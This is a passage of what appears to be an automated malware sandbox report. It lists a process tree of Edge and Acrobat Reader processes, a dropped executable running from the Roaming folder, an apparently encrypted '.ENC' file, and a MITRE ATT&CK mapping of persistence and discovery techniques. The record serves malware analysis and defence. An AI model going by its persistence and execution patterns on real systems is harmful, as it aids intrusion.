        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,3965902620211042924,4272112164319615069,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:8
        7⤵
        
        PID:1424
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,3965902620211042924,4272112164319615069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
        7⤵
        
        PID:1672
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,3965902620211042924,4272112164319615069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
        7⤵
        
        PID:3512
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,3965902620211042924,4272112164319615069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 /prefetch:8
        7⤵
        
        PID:3368
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1928,3965902620211042924,4272112164319615069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3000
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,3965902620211042924,4272112164319615069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1876 /prefetch:1
        7⤵
        
        PID:5552
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,3965902620211042924,4272112164319615069,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1884 /prefetch:1
        7⤵
        
        PID:5560
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,3965902620211042924,4272112164319615069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
        7⤵
        
        PID:5720
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,3965902620211042924,4272112164319615069,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
        7⤵
        
        PID:5728
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,3965902620211042924,4272112164319615069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3772 /prefetch:1
        7⤵
        
        PID:4944
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1928,3965902620211042924,4272112164319615069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
        7⤵
        
        PID:4064
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pornhub.com/
        6⤵
        
        PID:4460
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe86a046f8,0x7ffe86a04708,0x7ffe86a04718
        7⤵
        
        PID:808

C:\Users\Admin\AppData\Roaming\System User
"C:\Users\Admin\AppData\Roaming\System User"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:940

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5048

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3200

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5112

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4044
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\SaveAdd.pcx.ENC"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:3376
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3932
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=75C1006804F896C242395260149FE991 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=75C1006804F896C242395260149FE991 --renderer-client-id=2 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:1
      4⤵
      System Location Discovery: System Language Discovery
      PID:2988
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C565486D936606A9997E6A7CE5A49C2D --mojo-platform-channel-handle=1752 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:3700
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=794090510E96A0FF46D76537C8B9C9C3 --mojo-platform-channel-handle=2320 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:5160
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F7128291787E3ED848DA72C82CDCA9B8 --mojo-platform-channel-handle=2016 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:5240
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=51B66948DDC90256D61BDE5C033EC281 --mojo-platform-channel-handle=2328 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:5332

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery